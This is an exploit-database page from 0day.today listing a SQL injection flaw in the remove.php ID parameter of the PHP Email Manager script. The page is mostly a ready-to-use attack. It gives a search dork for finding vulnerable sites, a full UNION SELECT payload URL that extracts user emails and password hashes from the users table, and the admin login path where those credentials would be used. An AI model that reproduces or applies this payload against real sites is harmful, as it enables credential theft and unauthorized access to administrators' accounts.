[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP Email Manager (remove.php ID) SQL Injection Vulnerability

Author
MuShTaQ
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5674
Category
web applications
Date add
17-08-2009
Platform
unsorted
=============================================================
PHP Email Manager (remove.php ID) SQL Injection Vulnerability
=============================================================


===========================================|->
      ~ Mtrb3 hena [Security-Code] ~
===========================================|->

script :-> PHP Email Manager  < Remote SQL Injection Vulnerability >

Downlode:->http://webscripts.softpedia.com/script/Mailing-List-Managers/PHP-eMail-Manager-30652.html

Dork:->PHPEmailManager

Found by :-> [ MuShTaQ ]

===========================================|->
              ~  Exploit ~
===========================================|->

File :-> http//www.site.com/PHPEmailManager/remove.php?ID=[SQL]

Exploit:-> http://www.site.com/PHPEmailManager/remove.php?ID=-1+union+select+1,concat%28Email,0x3a,PasswordHash%29,3,4,5,6,7,8,9,10,11+from+php_email_man_Users--

Admin Login:-> http//www.site.com/PHPEmailManager/login.php



#  0day.today [2024-11-15]  #